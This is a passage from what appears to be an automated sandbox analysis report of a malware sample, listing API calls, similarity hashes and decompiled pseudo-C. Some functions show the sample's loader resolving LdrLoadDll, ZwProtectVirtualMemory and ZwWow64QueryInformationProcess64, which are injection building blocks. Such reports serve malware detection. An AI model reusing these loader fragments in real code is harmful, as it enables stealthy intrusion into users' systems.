      				struct HINSTANCE__* _t2;
      
      				_t2 = GetModuleHandleA("mscoree.dll");
      				if(_t2 != 0) {
      					_t2 = GetProcAddress(_t2, "CorExitProcess");
      					if(_t2 != 0) {
      						return _t2->i(_a4);
      					}
      				}
      				return _t2;
      			}

      APIs
      • GetModuleHandleA.KERNEL32(mscoree.dll,0040CE43,00000214,0040C743,000000FF,0000001E,00000001,00000000,00000000,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018), ref: 0040CE19
      • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001,?,?,0040D22C), ref: 0040CE29
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: CorExitProcess$mscoree.dll
      • API String ID: 1646373207-1276376045
      • Opcode ID: 8d160feb217aa1bd7d4dae39f124b2cbf41a6624c82ac813e61e7aac4fd57f39
      • Instruction ID: fcabfaf94eeba7cb859a5f7a285e885b6fa2fcfb323eecb89a6d1dbf4cb90af6
      • Opcode Fuzzy Hash: 8d160feb217aa1bd7d4dae39f124b2cbf41a6624c82ac813e61e7aac4fd57f39
      • Instruction Fuzzy Hash: 0FC012B4348302AACA001F718C0DB9B3AB8AE48B8171080B67008E11A1CBB8C90095E8
      APIs
      • GetStringTypeW.KERNEL32(00000001,00418118,00000001,?,00000100,?,?,?,?,?,0041311E,?,?,?,?,?), ref: 00412F65
      • GetLastError.KERNEL32(?,0041311E,?,?,?,?,?,?,?), ref: 00412F77
      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00413054
        • Part of subcall function 004134B0: GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,?,?,?), ref: 004134D2
      • GetStringTypeA.KERNEL32(?,?,?,0041311E,?,00000100,?,?,?,?,?,0041311E,?,?,?,?), ref: 004130C9
        • Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
        • Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00412B1D
        • Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(004181C4), ref: 00412B28
        • Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
        • Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,?), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,?,0040EFA6), ref: 00410D93
        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000), ref: 00413621
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: StringType$ErrorExceptionFilterLastProcessUnhandled$ByteCharCurrentDebuggerFreeHeapInfoLocaleMultiPresentTerminateWide
      • String ID:
      • API String ID: 2921542721-0
      • Opcode ID: 87293724a1808aebd5272e2655a6100abe24618218fab50748e6694a1345a00c
      • Instruction ID: d46c18d8d68949bb4ae9f948932a194cea07ec9ef34beebbf33d215d183c743c
      • Opcode Fuzzy Hash: 87293724a1808aebd5272e2655a6100abe24618218fab50748e6694a1345a00c
      • Instruction Fuzzy Hash: 70517C7150010AAFCF209F64DC819EF7FE9EB08355B20443AF905D6250D779DEE19BA8
      C-Code - Quality: 93%
      			E00410380(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr _t47;
      				signed int _t52;
      				signed int _t61;
      				signed int _t62;
      				signed int _t63;
      				long _t64;
      				LONG* _t67;
      				intOrPtr _t69;
      				LONG* _t73;
      				intOrPtr _t89;
      				void* _t92;
      				void* _t96;
      				intOrPtr _t97;
      				void* _t98;
      				void* _t101;
      
      				_t101 = __eflags;
      				_t87 = __edx;
      				_push(0x14);
      				_push(0x418d20);
      				E0040D48C(__ebx, __edi, __esi);
      				 *(_t98 - 0x20) =  *(_t98 - 0x20) | 0xffffffff;
      				_t89 = E0040FAC6(__ebx, __edx, _t101);
      				 *((intOrPtr*)(_t98 - 0x24)) = _t89;
      				E004100B7(__ebx, __edx, _t89, __esi, _t101);
      				_t47 = E0041015B( *((intOrPtr*)(_t98 + 8)));
      				 *((intOrPtr*)(_t98 + 8)) = _t47;
      				if(_t47 ==  *((intOrPtr*)( *(_t89 + 0x68) + 4))) {
      					_t41 = _t98 - 0x20;
      					 *_t41 =  *(_t98 - 0x20) & 0x00000000;
      					__eflags =  *_t41;
      					L26:
      					return E0040D4D1( *(_t98 - 0x20));
      				}
      				_t73 = E00411099(0x220);
      				_t103 = _t73;
      				if(_t73 == 0) {
      					goto L26;
      				}
      				_t96 =  *(_t89 + 0x68);
      				memcpy(_t73, _t96, 0x88 << 2);
      				_t92 = _t96 + 0x110;
      				 *_t73 =  *_t73 & 0x00000000;
      				_t52 = E004101D5(0, _t87, _t103,  *((intOrPtr*)(_t98 + 8)), _t73);
      				 *(_t98 - 0x20) = _t52;
      				if(_t52 != 0) {
      					__eflags = _t52 - 0xffffffff;
      					if(_t52 == 0xffffffff) {
      						__eflags = _t73 - 0x42c4a8;
      						if(__eflags != 0) {
      							_push(_t73);
      							E00410D1A(_t73, _t92, _t96, __eflags);
      						}
      						 *((intOrPtr*)(E0040D198(__eflags))) = 0x16;
      					}
      				} else {
      					_t97 =  *((intOrPtr*)(_t98 - 0x24));
      					_t13 = _t97 + 0x68; // 0x784
      					if(InterlockedDecrement( *_t13) == 0) {
      						_t14 = _t97 + 0x68; // 0x784
      						_t69 =  *_t14;
      						_t106 = _t69 - 0x42c4a8;
      						if(_t69 != 0x42c4a8) {
      							_push(_t69);
      							E00410D1A(_t73, _t92, _t97, _t106);
      						}
      					}
      					 *(_t97 + 0x68) = _t73;
      					_t93 = InterlockedIncrement;
      					InterlockedIncrement(_t73);
      					if(( *(_t97 + 0x70) & 0x00000002) == 0 && ( *0x42c9cc & 0x00000001) == 0) {
      						E0040D43F(_t73, InterlockedIncrement, 0xd);
      						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
      						 *0x436664 = _t73[1];
      						 *0x436668 = _t73[2];
      						 *0x43666c = _t73[3];
      						_t61 = 0;
      						while(1) {
      							 *(_t98 - 0x1c) = _t61;
      							if(_t61 >= 5) {
      								break;
      							}
      							 *((short*)(0x436658 + _t61 * 2)) =  *((intOrPtr*)(_t73 + 0x10 + _t61 * 2));
      							_t61 = _t61 + 1;
      						}
      						_t62 = 0;
      						__eflags = 0;
      						while(1) {
      							 *(_t98 - 0x1c) = _t62;
      							__eflags = _t62 - 0x101;
      							if(_t62 >= 0x101) {
      								break;
      							}
      							 *((char*)(_t62 + 0x42c6c8)) =  *((intOrPtr*)( &(_t73[7]) + _t62));
      							_t62 = _t62 + 1;
      						}
      						_t63 = 0;
      						__eflags = 0;
      						while(1) {
      							 *(_t98 - 0x1c) = _t63;
      							__eflags = _t63 - 0x100;
      							if(_t63 >= 0x100) {
      								break;
      							}
      							 *((char*)(_t63 + 0x42c7d0)) =  *((intOrPtr*)( &(_t73[0x47]) + _t63));
      							_t63 = _t63 + 1;
      						}
      						_t64 = InterlockedDecrement( *0x42c8d0);
      						__eflags = _t64;
      						if(_t64 == 0) {
      							_t67 =  *0x42c8d0; // 0x1d314b0
      							__eflags = _t67 - 0x42c4a8;
      							if(__eflags != 0) {
      								_push(_t67);
      								E00410D1A(_t73, _t93, _t97, __eflags);
      							}
      						}
      						 *0x42c8d0 = _t73;
      						InterlockedIncrement(_t73);
      						 *(_t98 - 4) = 0xfffffffe;
      						E004104E1();
      					}
      				}
      			}

      APIs
        • Part of subcall function 004100B7: InterlockedDecrement.KERNEL32(?), ref: 00410110
        • Part of subcall function 004100B7: InterlockedIncrement.KERNEL32(01D314B0), ref: 0041013B
        • Part of subcall function 0041015B: GetOEMCP.KERNEL32(00000000,?,0040F3F2), ref: 00410182
        • Part of subcall function 0041015B: GetACP.KERNEL32(00000000,?,0040F3F2), ref: 004101A5
        • Part of subcall function 00411099: Sleep.KERNEL32(00000000,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001,?,?,0040D22C,00000004,00418C58,0000000C,004110EC), ref: 004110B6
        • Part of subcall function 004101D5: GetCPInfo.KERNEL32(00000000,0041052A,00000000,?,00000000,00418D20), ref: 0041022B
      • InterlockedDecrement.KERNEL32(00000784), ref: 004103F6
      • InterlockedIncrement.KERNEL32(00000000), ref: 0041041B
        • Part of subcall function 0040D43F: EnterCriticalSection.KERNEL32(?,?,?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 0040D467
      • InterlockedDecrement.KERNEL32 ref: 004104AD
      • InterlockedIncrement.KERNEL32(00000000), ref: 004104D1
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Interlocked$DecrementIncrement$CriticalEnterErrorFreeHeapInfoLastSectionSleep
      • String ID:
      • API String ID: 2389022545-0
      • Opcode ID: f6a90a7c0af97f40d7f07acc023a57620c87fa2eb5766b16b51f16715c1810fa
      • Instruction ID: 6b68cbd896846394304d0449b409a003626e702cc587c9906820f4b381173e56
      • Opcode Fuzzy Hash: f6a90a7c0af97f40d7f07acc023a57620c87fa2eb5766b16b51f16715c1810fa
      • Instruction Fuzzy Hash: 474192719003099BDB10EF75D8C569E3BE0AF08328F14856BE945DB2A1DBBCD8C18B6C
      APIs
      • Sleep.KERNEL32(000000C8), ref: 002D506A
      • lstrlenW.KERNEL32(?), ref: 002D50A0
        • Part of subcall function 002D1000: RtlAllocateHeap.NTDLL(00000000,?,002D4CB5), ref: 002D100C
      • memcpy.NTDLL(00000000,?,?,?), ref: 002D50C1
      • SysFreeString.OLEAUT32(?), ref: 002D50D5
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AllocateFreeHeapSleepStringlstrlenmemcpy
      • String ID:
      • API String ID: 651314941-0
      • Opcode ID: ca268cc89325912e4dd919bd1dafe87b111ff1d57872e836667d0f7960ce1956
      • Instruction ID: 49a46fdc2037016d7b1d5f2d6374c5132107c8d57e3b37a60e0264fe8c6cb9bc
      • Opcode Fuzzy Hash: ca268cc89325912e4dd919bd1dafe87b111ff1d57872e836667d0f7960ce1956
      • Instruction Fuzzy Hash: 8E213175901619EFCB10DFA8D984D9EBBB8FF49311B20416AE905D7310E7719E54CF90
      APIs
      • RtlReAllocateHeap.NTDLL(00000000,00436BE4,?,00000000), ref: 0040E58F
      • RtlAllocateHeap.NTDLL(00000008,000041C4), ref: 0040E5C5
      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,0040EAC2), ref: 0040E5DF
      • HeapFree.KERNEL32(00000000,?), ref: 0040E5F6
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Heap$Allocate$AllocFreeVirtual
      • String ID:
      • API String ID: 94566200-0
      • Opcode ID: e68206b2571ad2f33e4c0a726f1a4164fb77a1f21caaad09450859c6edacd99a
      • Instruction ID: a73b86c3c3e85fffb530331acd84b0771d661e4ca93faab2e0671b4a69d89a33
      • Opcode Fuzzy Hash: e68206b2571ad2f33e4c0a726f1a4164fb77a1f21caaad09450859c6edacd99a
      • Instruction Fuzzy Hash: C6119171548712BBC7218F65FD45956BBB5F7943207129D3AF2A2EB1F0D370A8108F68
      APIs
      • GetLastError.KERNEL32(?,?,0040EFA6), ref: 0040FA45
        • Part of subcall function 0040F928: TlsGetValue.KERNEL32(0040FA52,?,?,0040EFA6), ref: 0040F92E
        • Part of subcall function 0040F928: TlsSetValue.KERNEL32(00000000,?,0040EFA6), ref: 0040F94B
      • TlsGetValue.KERNEL32(?,?,0040EFA6), ref: 0040FA5E
      • SetLastError.KERNEL32(00000000,?,?,0040EFA6), ref: 0040FABB
        • Part of subcall function 004110D9: Sleep.KERNEL32(00000000), ref: 004110FE
        • Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(0041804C,?,0040F943,?,?,0040EFA6), ref: 0040F8F5
        • Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,0041805C,?,0040F943,?,?,0040EFA6), ref: 0040F905
        • Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?,?,0040F943,?,?,0040EFA6), ref: 0040F913
      • GetCurrentThreadId.KERNEL32(?,?,0040EFA6), ref: 0040FAA3
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,?), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,?,0040EFA6), ref: 00410D93
        • Part of subcall function 0040F98F: GetModuleHandleA.KERNEL32(0041804C,?,?,0040EFA6), ref: 0040F9A0
        • Part of subcall function 0040F98F: InterlockedIncrement.KERNEL32(0042C4A8), ref: 0040F9FB
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ErrorLastValue$HandleModule$AddressCurrentDecodeFreeHeapIncrementInterlockedPointerProcSleepThread
      • String ID:
      • API String ID: 361139372-0
      • Opcode ID: d2ef33143c1287e03155dba053b2720c21a804814e0b140adeb12520a9994683
      • Instruction ID: 6d716f5d6e4b1e895fa7b9618fa206aa9ec14b102bb12d30c8e4a116d539e29e
      • Opcode Fuzzy Hash: d2ef33143c1287e03155dba053b2720c21a804814e0b140adeb12520a9994683
      • Instruction Fuzzy Hash: 10F0D633605321ABC7317B75BC066AB3E65AF087A1710413AF909A65E1CF39C8418A9C
      C-Code - Quality: 68%
      			E0040FA43(void* __ebx) {
      				void* __edi;
      				void* __esi;
      				void* _t10;
      				long _t13;
      				long _t21;
      				long* _t22;
      
      				_t21 = GetLastError();
      				E0040F928();
      				_push( *0x42c490);
      				_t22 =  *(TlsGetValue( *0x42c494))();
      				if(_t22 == 0) {
      					_t22 = E004110D9(1, 0x214);
      					if(_t22 != 0) {
      						_push(_t22);
      						_push( *0x42c490);
      						_t10 =  *((intOrPtr*)(E0040F8BC( *0x43664c)))();
      						_t25 = _t10;
      						if(_t10 == 0) {
      							_push(_t22);
      							E00410D1A(__ebx, _t21, _t22, __eflags);
      							_t22 = 0;
      							__eflags = 0;
      						} else {
      							_push(0);
      							_push(_t22);
      							E0040F98F(__ebx, _t21, _t22, _t25);
      							_t13 = GetCurrentThreadId();
      							_t22[1] = _t22[1] | 0xffffffff;
      							 *_t22 = _t13;
      						}
      					}
      				}
      				SetLastError(_t21);
      				return _t22;
      			}









      APIs
      • GetLastError.KERNEL32(00007FFF,00000000,0040D19D,0040C5A4,00418BD0,00000010,00402D4A,00417248), ref: 0040FA45
        • Part of subcall function 0040F928: TlsGetValue.KERNEL32(0040FA52), ref: 0040F92E
        • Part of subcall function 0040F928: TlsSetValue.KERNEL32(00000000), ref: 0040F94B
      • TlsGetValue.KERNEL32 ref: 0040FA5E
      • SetLastError.KERNEL32(00000000), ref: 0040FABB
        • Part of subcall function 004110D9: Sleep.KERNEL32(00000000,0040FA78,00000001,00000214), ref: 004110FE
        • Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000000,0040F943), ref: 0040F8C9
        • Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000004), ref: 0040F8E0
        • Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0040F8F5
        • Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040F905
        • Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?), ref: 0040F913
      • GetCurrentThreadId.KERNEL32 ref: 0040FAA3
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93
        • Part of subcall function 0040F98F: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00418CB8,0000000C,0040FAA1,00000000,00000000), ref: 0040F9A0
        • Part of subcall function 0040F98F: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040F9C9
        • Part of subcall function 0040F98F: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040F9D9
        • Part of subcall function 0040F98F: InterlockedIncrement.KERNEL32(0042C4A8), ref: 0040F9FB
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Value$AddressErrorLastProc$HandleModule$CurrentDecodeFreeHeapIncrementInterlockedPointerSleepThread
      • String ID:
      • API String ID: 425413561-0
      • Opcode ID: 1b8de33cadd475d300f6bb80ced010cc9dd54014d7b858da1519cee61fc2bd9c
      • Instruction ID: 6d716f5d6e4b1e895fa7b9618fa206aa9ec14b102bb12d30c8e4a116d539e29e
      • Opcode Fuzzy Hash: 1b8de33cadd475d300f6bb80ced010cc9dd54014d7b858da1519cee61fc2bd9c
      • Instruction Fuzzy Hash: 10F0D633605321ABC7317B75BC066AB3E65AF087A1710413AF909A65E1CF39C8418A9C
      C-Code - Quality: 81%
      			E0040139F(signed int __edx, intOrPtr _a8) {
      				intOrPtr _v0;
      				intOrPtr _v8;
      				void* _v20;
      				signed int _t5;
      				signed int _t6;
      				signed int _t7;
      				signed int _t9;
      				signed int _t12;
      				signed int _t13;
      				signed int _t14;
      				void* _t15;
      
      				_t14 = __edx;
      				_t5 =  *0x40545c; // 0x0
      				_t15 = 0;
      				_t6 = _t5 |  *0x405460;
      				if(_t6 == 0) {
      					L3:
      					_t15 = 0x7f;
      					_push("LdrLoadDll");
      					_push(_a8);
      					"j0hPA@"();
      					 *0x40545c = _t6;
      					_t7 = _t6 | _t14;
      					 *0x405460 = _t14;
      					if(_t7 != 0) {
      						_push("LdrGetProcedureAddress");
      						_push(_v0);
      						"j0hPA@"();
      						 *0x405464 = _t7;
      						_t9 = _t7 | _t14;
      						 *0x405468 = _t14;
      						if(_t9 != 0) {
      							_push("ZwProtectVirtualMemory");
      							_push(_v8);
      							"j0hPA@"();
      							 *0x40546c = _t9;
      							 *0x405470 = _t14;
      							if((_t9 | _t14) != 0) {
      								_t15 = 0;
      								goto L7;
      							}
      						}
      					}
      				} else {
      					_t12 =  *0x405464; // 0x0
      					_t6 = _t12 |  *0x405468;
      					if(_t6 == 0) {
      						goto L3;
      					} else {
      						_t13 =  *0x40546c; // 0x0
      						_t6 = _t13 |  *0x405470;
      						if(_t6 != 0) {
      							L7:
      							memcpy(_v20, 0x40545c, 0x18);
      						} else {
      							goto L3;
      						}
      					}
      				}
      				return _t15;
      			}














      APIs
        • Part of subcall function 004025AD: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,00404150,00000030,00402138,ZwGetContextThread,?,004021CE,?,00000318,00000008), ref: 004025E9
        • Part of subcall function 004025AD: VirtualFree.KERNEL32(?,00000000,00008000,00000010,?,?,00404150,00000030,00402138,ZwGetContextThread,?,004021CE,?,00000318,00000008), ref: 00402672
      • memcpy.NTDLL(?,0040545C,00000018,?,ZwProtectVirtualMemory,?,LdrGetProcedureAddress,?,LdrLoadDll,?,00401610,?,?,?,?,00000000), ref: 00401430
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Virtual$AllocFreememcpy
      • String ID: LdrGetProcedureAddress$LdrLoadDll$ZwProtectVirtualMemory
      • API String ID: 4010158826-2710412950
      • Opcode ID: d8561f7d003f83693803ecea9f943d1b4d5465cf4284b455f53a8aea5818bb9c
      • Instruction ID: 01bc93e60ed2784d55cc8534dfa48ba2fc30ad28bcf1aabaee45f6fb336d972a
      • Opcode Fuzzy Hash: d8561f7d003f83693803ecea9f943d1b4d5465cf4284b455f53a8aea5818bb9c
      • Instruction Fuzzy Hash: D7014C30651A11ABC710EF65EE46B8777E0F790706B59883BB044BA2F2D3789894CF6D
      APIs
      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 002DE551
      • GetVersion.KERNEL32 ref: 002DE560
      • GetCurrentProcessId.KERNEL32 ref: 002DE577
      • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 002DE590
      Memory Dump Source
      • Source File: 00000001.00000002.3011396965.00000000002DE000.00000040.sdmp, Offset: 002DE000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2de000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Process$CreateCurrentEventOpenVersion
      • String ID:
      • API String ID: 845504543-0
      • Opcode ID: 8f6ce72ff6f1d89e85702df2e4ee5ef1f61c458c50eb7c89673b9968cf0f0864
      • Instruction ID: 6862ce5e624dff8c900e18dd938d6dbd9134fb14e61a210a56584a337cc5134d
      • Opcode Fuzzy Hash: 8f6ce72ff6f1d89e85702df2e4ee5ef1f61c458c50eb7c89673b9968cf0f0864
      • Instruction Fuzzy Hash: 40F0AFB06546018EEF20AF28BF09BD53BA8E744BA6F410136E784FA1E0E37048918F0C
      APIs
      • RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D47D6
      • Sleep.KERNEL32(0000000A,?,?,00000000,pnls,?,00000000,pnls,?,?,?,002D1FE5,00000058,00000000), ref: 002D47E0
      • HeapFree.KERNEL32(00000000,00000000), ref: 002D4808
        • Part of subcall function 002D4593: StrTrimA.SHLWAPI(?,002DA28C), ref: 002D45CC
        • Part of subcall function 002D4593: StrTrimA.SHLWAPI(00000001,002DA28C), ref: 002D45E9
      • RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4824
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: CriticalSectionTrim$EnterFreeHeapLeaveSleep
      • String ID:
      • API String ID: 4004549260-0
      • Opcode ID: 32e50c33b27dd6d2c97a46f80eed04447dc4c788ce84990034d077343beee6c0
      • Instruction ID: 47b249322d7b3e75046c4b3d75c30194b3ab4cd3b0c12b76561db0f98447823d
      • Opcode Fuzzy Hash: 32e50c33b27dd6d2c97a46f80eed04447dc4c788ce84990034d077343beee6c0
      • Instruction Fuzzy Hash: 5AF03471A22202DBD622AF28ED4CF1A77A4AB25782F154417F841C2260C334EC20CB26
      APIs
      • SetEvent.KERNEL32(002DB220), ref: 002D10E0
      • SleepEx.KERNEL32(00000064,00000001), ref: 002D10EF
      • CloseHandle.KERNEL32(002DB220), ref: 002D1110
      • HeapDestroy.KERNEL32(002DB1F0), ref: 002D1120
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: CloseDestroyEventHandleHeapSleep
      • String ID:
      • API String ID: 4109453060-0
      • Opcode ID: 050b561464dcf688cc1d0f482254fba5694065773ea6b2686163efbf6b47d1ff
      • Instruction ID: f4eb7bbf751c1738ef6aad1d3f1b0f87e3f7d97e50450169ca974a295bdfe12d
      • Opcode Fuzzy Hash: 050b561464dcf688cc1d0f482254fba5694065773ea6b2686163efbf6b47d1ff
      • Instruction Fuzzy Hash: C6F01C32E16312ABD7216F75BC5DF1A37A8AB08752B058116BD05D36A0DB24CC64CA50
      APIs
      • RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D48F4
      • Sleep.KERNEL32(0000000A,?,?,00000000,pnls,?,00000000,pnls,?,?,?,002D1FE5,00000058,00000000), ref: 002D48FE
      • HeapFree.KERNEL32(00000000), ref: 002D492C
      • RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4941
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: CriticalSection$EnterFreeHeapLeaveSleep
      • String ID:
      • API String ID: 58946197-0
      • Opcode ID: 5bfbe0f925974db9c267e47adcc56d32a96673c5c1f7b1e7545164c022452987
      • Instruction ID: 1aa5b107ecfaa15f1a969400bd4e1e360ccc7297493f652d9a5217491cf22a5d
      • Opcode Fuzzy Hash: 5bfbe0f925974db9c267e47adcc56d32a96673c5c1f7b1e7545164c022452987
      • Instruction Fuzzy Hash: 33F034B5A12202DBDB09AF25FD6CF2A33A4BB15706F01400BF882D3360C334AC10CB21
      C-Code - Quality: 81%
      			E00401EFE(intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr* _a16) {
      				char _v8;
      				signed int _v12;
      				intOrPtr _v16;
      				intOrPtr _v20;
      				signed int _v24;
      				unsigned int _v28;
      				intOrPtr _v32;
      				char _v36;
      				signed int _v40;
      				intOrPtr _v44;
      				char _v84;
      				char _v92;
      				void* __esi;
      				_Unknown_base(*)()* _t80;
      				intOrPtr* _t81;
      				intOrPtr _t84;
      				intOrPtr _t88;
      				intOrPtr _t90;
      				intOrPtr _t92;
      				intOrPtr _t94;
      				signed int* _t95;
      				unsigned int _t102;
      				intOrPtr _t104;
      				signed int _t105;
      				char* _t107;
      				signed int _t109;
      				signed int* _t111;
      				char _t124;
      				void* _t125;
      				intOrPtr* _t127;
      				intOrPtr _t128;
      				unsigned int _t131;
      
      				_v24 = _v24 & 0x00000000;
      				_v12 = _v12 & 0x00000000;
      				_t109 = 0;
      				_t80 = GetProcAddress( *0x4054c4, "ZwWow64QueryInformationProcess64");
      				if(_t80 == 0) {
      					L23:
      					_t81 = _a16;
      					if(_t81 != 0) {
      						 *_t81 = _t109;
      					}
      					if(_t109 <= _a12 && _t109 != 0) {
      						_v24 = 1;
      					}
      					return _v24;
      				}
      				_push( &_v8);
      				_push(0x30);
      				_push( &_v92);
      				_push(0);
      				_push(_a4);
      				if( *_t80() < 0) {
      					goto L23;
      				}
      				_t84 = E00401046(0x200);
      				_v20 = _t84;
      				if(_t84 == 0) {
      					goto L23;
      				}
      				_t125 = E00401046(0x100);
      				if(_t125 == 0) {
      					L21:
      					E0040105B(_v20);
      					if(_t125 != 0) {
      						E0040105B(_t125);
      					}
      					goto L23;
      				}
      				_t88 = E00401EAA( &_v92,  &_v84, _a4, _t125, 0x28);
      				_v8 = _t88;
      				if(_t88 == 0) {
      					goto L21;
      				}
      				_t12 = _t125 + 0x28; // 0x28
      				_t14 = _t125 + 0x18; // 0x18
      				_t127 = _t14;
      				_t90 = E00401EAA( &_v92, _t127, _a4, _t12, 0x40);
      				_v8 = _t90;
      				if(_t90 == 0) {
      					goto L21;
      				}
      				_t114 =  *(_t127 + 4);
      				_t124 =  *((intOrPtr*)(_t125 + 0x38));
      				_t128 =  *((intOrPtr*)(_t125 + 0x3c));
